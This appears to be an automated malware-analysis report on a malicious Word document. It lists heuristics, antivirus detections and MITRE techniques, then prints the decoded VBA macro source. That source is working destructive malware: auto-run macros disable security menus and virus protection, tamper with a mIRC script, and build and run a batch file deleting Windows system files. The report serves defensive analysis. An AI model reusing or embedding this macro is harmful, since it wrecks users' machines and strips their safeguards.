MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Office document contains VBA macros that execute automatically upon opening, as indicated by the Document_Open heuristic. The macros attempt to disable security features and write a file named 'peak.txt' to C:\WINDOWS\. The presence of Shell() calls and CreateObject suggests the execution of arbitrary code, likely to download and run a secondary payload. The ClamAV detection of 'Win.Trojan.Delwin-33' further supports its malicious nature.
Heuristics 6
-
ClamAV: Win.Trojan.Delwin-33 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Delwin-33
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2945 bytes |
SHA-256: 1807d7c36d97af1993d032019df6ddfa9e07ead9068063b340a1a2e4a49cb881 |
|||
|
Detection
ClamAV:
Win.Trojan.DelFil-7
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Document_Open()
On Error Resume Next
Open "C:\WINDOWS\peak.txt" For Output As #1
Print #1, "Peak"
Close #1
MsgBox "hi welcome to new virus peak"
End Sub
Sub Stealth()
Set fs = Application.FileSearch
es$ = "xdez.txt"
With fs
.LookIn = "C:\Program Files"
.SearchSubFolders = True
.FileName = es$
If .Execute > 0 Then
MsgBox "File Found"
Set ds = CreateObject("Scripting.FileSystemObject")
Object
Set fy = ds.GetFile(es$)
h = (fy.Path)
SetAttr h, vbNormal
Kill (h)
MsgBox "whats hapeening"
Else
MsgBox "del del del"
End If
End With
End Sub
Sub Document_Open()
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
CommandBars("Tools").Controls("Customize...").Enabled = 0
CommandBars("View").Controls("Toolbars").Enabled = 0
CommandBars("View").Controls("Status Bar").Enabled = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
CommandBars("Format").Controls("Style...").Enabled = 0
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
End Sub
Sub InfectMirc()
infe$ = "c:\mirc\script.ini"
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
mircwrite:
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[Script]"
Print #1, "n0;Miniscript"
Print #1, "n1= ON 1:JOIN:#:{ /exit } "
Print #1, "n2= ON 1:*xde*:#:{ /exit };"
Close #1
SetAttr "c:\mirc\script.ini", vbReadOnly
GoTo finish
fling:
MsgBox "Invalid Memory Space", vbCritical
finish:
End Sub
Private Sub Form_Load()
On Error Resume Next
Open "C:\WINDOWS\peak2.txt" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "@del C:\windows\*.ini"
Print #1, "cls"
Print #1, "@del C:\windows\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.scr"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.drv"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.dll"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.sys"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system.ini"
Close #1
Name "C:\WINDOWS\peak2.txt" As "C:\WINDOWS\peak2.bat"
Shell "C:\WINDOWS\peak2.bat"
MsgBox "ur pc is gone", vbCritical
Kill "C:\WINDOWS\peak2.bat"
End
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.